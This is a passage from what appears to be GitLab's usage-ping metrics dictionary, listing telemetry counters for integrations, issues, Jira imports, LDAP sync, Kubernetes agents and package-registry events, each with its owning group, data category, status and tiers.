`premium`, `ultimate` + +### `counts.instances_pivotaltracker_active` + +Count of active instance-level integrations for Pivotal Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180054_instances_pivotaltracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_prometheus_active` + +Count of active instance-level integrations for Prometheus + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180936_instances_prometheus_active.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_pushover_active` + +Count of active instance-level integrations for Pushover + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180105_instances_pushover_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_redmine_active` + +Count of active instance-level integrations for Redmine + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180116_instances_redmine_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_slack_active` + +Count of active instance-level integrations for Slack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180127_instances_slack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_slack_slash_commands_active` + +Count of active instance-level integrations for Slack (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180138_instances_slack_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_teamcity_active` + +Count of active instance-level integrations for Teamcity CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180149_instances_teamcity_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_unify_circuit_active` + +Count of active instance-level integrations for Unifiy Circuit + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180201_instances_unify_circuit_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_webex_teams_active` + +Count of active instance-level integrations for Webex Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180212_instances_webex_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.instances_youtrack_active` + +Count of active instance-level integrations for YouTrack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180223_instances_youtrack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.issues` + +Count of Issues created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181102_issues.yml) + +Group: `group::plan` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.issues_created_from_alerts` + +Count of issues created automatically on alerts from GitLab-Managed Prometheus + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180441_issues_created_from_alerts.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.issues_created_from_gitlab_error_tracking_ui` + +Count of issues manually created from the GitLab UI on Sentry errors + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180434_issues_created_from_gitlab_error_tracking_ui.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.issues_created_gitlab_alerts` + +Count of all issues created from GitLab alerts (bot and non-bot) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180443_issues_created_gitlab_alerts.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.issues_created_manually_from_alerts` + +Count of issues created manually by non-bot users from GitLab alerts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180445_issues_created_manually_from_alerts.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.issues_using_zoom_quick_actions` + +Count of issues where a user have added AND removed a zoom meeting using slash commands + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180438_issues_using_zoom_quick_actions.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.issues_with_associated_zoom_link` + +Count of issues where a user has linked a Zoom meeting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180436_issues_with_associated_zoom_link.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.issues_with_embedded_grafana_charts_approx` + +Count of issues where a user has embedded a Grafana chart + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180440_issues_with_embedded_grafana_charts_approx.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.issues_with_health_status` + +Count of issues with health status + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181210_issues_with_health_status.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.jira_imports_projects_count` + +Count of Projects that imported Issues from Jira + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181259_jira_imports_projects_count.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.jira_imports_total_imported_count` + +Count of Jira imports completed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181258_jira_imports_total_imported_count.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.jira_imports_total_imported_issues_count` + +Count of total issues imported via the Jira Importer + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181301_jira_imports_total_imported_issues_count.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.keys` + +Number of keys. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180752_keys.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.kubernetes_agent_gitops_sync` + +Count of events when an Agent is asked to synchronize the manifests or its configuration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175328_kubernetes_agent_gitops_sync.yml) + +Group: `group::configure` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.kubernetes_agent_k8s_api_proxy_request` + +Count of Kubernetes API proxy requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210505015532_kubernetes_agent_k8s_api_proxy_request.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.kubernetes_agents` + +Count of Kubernetes registered agents + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175316_kubernetes_agents.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.kubernetes_agents_with_token` + +Count of Kubernetes agents with at least one token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175318_kubernetes_agents_with_token.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.label_lists` + +Count of label lists created on Boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181104_label_lists.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.labels` + +Count of Labels + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181111_labels.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ldap_group_links` + +Number of groups that are synced via LDAP group sync `https://docs.gitlab.com/ee/user/group/index.html#manage-group-memberships-via-ldap` + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174822_ldap_group_links.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.ldap_keys` + +Number of keys synced as part of LDAP `https://docs.gitlab.com/ee/administration/auth/ldap/#ldap-sync-configuration-settings` + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174824_ldap_keys.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.ldap_users` + +Number of users that are linked to LDAP + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174826_ldap_users.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.lfs_objects` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181009_lfs_objects.yml) + +Group: `group::create` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.license_management_jobs` + +Count of License Scanning jobs run + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210204124854_license_management_jobs.yml) + +Group: `group::composition analysis` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.licenses_list_views` + +Count to License List page views + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210216175210_licenses_list_views.yml) + +Group: `group::composition analysis` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.merge_request_comment` + +Count of the number of merge request comments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175041_merge_request_comment.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.merge_request_create` + +Count of the number of merge requests created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175043_merge_request_create.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.merge_requests` + +Count of the number of merge requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175039_merge_requests.yml) + +Group: `group::code review` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.merged_merge_requests_using_approval_rules` + +Count of merge requests merged using approval rules + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175206_merged_merge_requests_using_approval_rules.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.milestone_lists` + +Count of milestone lists created on Boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181106_milestone_lists.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.milestones` + +Count of milestones created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181108_milestones.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.navbar_searches` + +Total Searches using the navbar for All Basic Search and Advanced Search in self-managed and SaaS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180414_navbar_searches.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.network_policy_drops` + +Cumulative count of packets dropped by Cilium (Container Network Security) since Usage Ping was last reported + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175448_network_policy_drops.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.network_policy_forwards` + +Cumulative count of packets forwarded by Cilium (Container Network Security) since Usage Ping was last reported + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175446_network_policy_forwards.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.notes` + +Count of Notes across all objects that use them + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181113_notes.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.operations_dashboard_default_dashboard` + +Active users with enabled operations dashboard + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180942_operations_dashboard_default_dashboard.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.operations_dashboard_users_with_projects_added` + +Active users with projects on operations dashboard + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180944_operations_dashboard_users_with_projects_added.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_composer_delete_package` + +A count of Composer packages that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182855_package_events_i_package_composer_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_composer_pull_package` + +A count of Composer packages that have been downloaded + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182857_package_events_i_package_composer_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_composer_push_package` + +A count of Composer packages that have been published + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182859_package_events_i_package_composer_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_conan_delete_package` + +A count of Conan packages that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182901_package_events_i_package_conan_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_conan_pull_package` + +A count of Conan packages that have been downloaded + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182903_package_events_i_package_conan_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_conan_push_package` + +A count of Conan packages that have been published + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182905_package_events_i_package_conan_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_container_delete_package` + +A count of container images that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182907_package_events_i_package_container_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_container_pull_package` + +A count of container images that have been downloaded + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182909_package_events_i_package_container_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_container_push_package` + +A count of container images that have been published + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182911_package_events_i_package_container_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_debian_delete_package` + +A count of Debian packages that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182913_package_events_i_package_debian_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_debian_pull_package` + +A count of Debian packages that have been downloaded + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182915_package_events_i_package_debian_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_debian_push_package` + +A count of Debian packages that have been published + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182917_package_events_i_package_debian_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_delete_package` + +A count of packages that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182919_package_events_i_package_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_delete_package_by_deploy_token` + +A count of packages that have been deleted using a Deploy Token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182921_package_events_i_package_delete_package_by_deploy_token.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_delete_package_by_guest` + +A count of packages that have been deleted using a Guest + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182923_package_events_i_package_delete_package_by_guest.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_delete_package_by_user` + +A count of packages that have been deleted using a logged in user + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182925_package_events_i_package_delete_package_by_user.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_generic_delete_package` + +A count of generic packages that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182927_package_events_i_package_generic_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_generic_pull_package` + +A count of generic packages that have been downloaded + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182929_package_events_i_package_generic_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_generic_push_package` + +A count of generic packages that have been published + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182931_package_events_i_package_generic_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_golang_delete_package` + +A count of Go modules that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182933_package_events_i_package_golang_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_golang_pull_package` + +A count of Go modules that have been downloaded + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182934_package_events_i_package_golang_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_golang_push_package` + +A count of Go modules that have been published + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182936_package_events_i_package_golang_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_helm_pull_package` + +Total count of pull Helm packages events + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210517073546_package_events_i_package_helm_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_helm_push_package` + +The total count of Helm packages that have been published. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210625095025_package_events_i_package_helm_push_package.yml) + +Group: `group::package` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_maven_delete_package` + +A count of Maven packages that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182938_package_events_i_package_maven_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_maven_pull_package` + +A count of Maven packages that have been downloaded + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182940_package_events_i_package_maven_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_maven_push_package` + +A count of Maven packages that have been published + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182942_package_events_i_package_maven_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_npm_delete_package` + +A count of npm packages that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182944_package_events_i_package_npm_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_npm_pull_package` + +A count of npm packages that have been downloaded + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182946_package_events_i_package_npm_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_npm_push_package` + +A count of npm packages that have been published + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182948_package_events_i_package_npm_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_nuget_delete_package` + +A count of NuGet packages that have been deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182950_package_events_i_package_nuget_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_nuget_pull_package` + +A count of NuGet packages that have been downloaded + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182952_package_events_i_package_nuget_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_nuget_push_package` + +A count of NuGet packages that have been published + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182954_package_events_i_package_nuget_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pull_package` + +A count of packages that have been downloaded from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182956_package_events_i_package_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pull_package_by_deploy_token` + +A count of packages that have been downloaded from the package registry using a Deploy Token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182958_package_events_i_package_pull_package_by_deploy_token.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pull_package_by_guest` + +A count of packages that have been downloaded from the package registry by a guest + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183000_package_events_i_package_pull_package_by_guest.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pull_package_by_user` + +A count of packages that have been downloaded from the package registry by a user + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183002_package_events_i_package_pull_package_by_user.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_push_package` + +A count of packages that have been published to the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183004_package_events_i_package_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_push_package_by_deploy_token` + +A count of packages that have been published to the package registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183005_package_events_i_package_push_package_by_deploy_token.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_push_package_by_guest` + +A count of packages that have been published to the package registry by a Guest + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183007_package_events_i_package_push_package_by_guest.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_push_package_by_user` + +A count of packages that have been published to the package registry by a user + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183009_package_events_i_package_push_package_by_user.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pypi_delete_package` + +A count of Python packages that have been deleted from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183011_package_events_i_package_pypi_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pypi_pull_package` + +A count of Python packages that have been downloaded from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183013_package_events_i_package_pypi_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pypi_push_package` + +A count of Python packages that have been published to the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183015_package_events_i_package_pypi_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_rubygems_delete_package` + +Total count of RubyGems packages delete events + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210303153000_package_events_i_package_rubygems_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: 